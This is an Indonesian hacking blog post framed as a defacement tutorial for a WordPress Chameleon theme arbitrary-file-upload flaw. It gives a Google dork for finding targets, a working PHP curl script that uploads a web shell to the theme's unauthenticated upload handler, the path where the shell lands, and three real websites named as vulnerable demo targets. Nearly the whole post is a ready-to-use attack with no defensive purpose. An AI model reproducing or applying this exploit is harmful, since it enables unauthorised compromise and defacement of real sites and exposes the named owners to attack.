Sunday, November 3, 2013

2 Exploit WordPress Chameleon theme Arbitrary File Upload Vulnerability

nama Satality32 - ./ halow om , ketemu lg sama saya om kali ini saya ingin berbagi ke om tentang Teknik Deface dengan cara "exploit WordPress Chameleon theme"

Teknik ini di shared oleh DaOne aka MockingBird di 1337day.com (mirror) oke langsung ajh ea om 

 Google dork: inurl:/wp-content/themes/cameleon/
# Exploit

<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://{Target}/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

 Lokasi HasilUpload shell bisa di cek di  http://[target]/wp-content/uploads/2013/11/{filename}.php
Demo Site : 
Demo sites
http://mirrorimagecounseling.org/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://sakpasemedia.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

http://www.818420.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Artikel Di Tulis Oleh :
Labels:

2 comments:

hendrik said...

tutorialnya dari awal gimana om, maklum newbie :D

November 3, 2013 at 8:05 PM
Unknown said...

coba om langsung ke mirror saja :)

November 3, 2013 at 9:05 PM

Post a Comment

Silahkan Om Tinggalkan jejak di blog ini | Semua Orang dapat berkomentar di Blog ini dan Bila Om tidak punya akun Gmail / OpenID , om dapat mengunakan Fitur Tanpa Nama , jadi Om bisa berkomentar di blog ini , tp ingat om komentarnya jangan Gunakan bahasa kasar / jorok , karena blog ini di baca di seluruh dunia



==>> Komentar Mu adalah Harimau mu <<==

Subscribe to: Post Comments (Atom)
 
Copyright © 2011-2013. Satality32 - All Rights Reserved.
Facebook . Twitter . Google+ . Sent Email
Template Design by Eka Syahwan (p0rt666) - Powered by Blogger.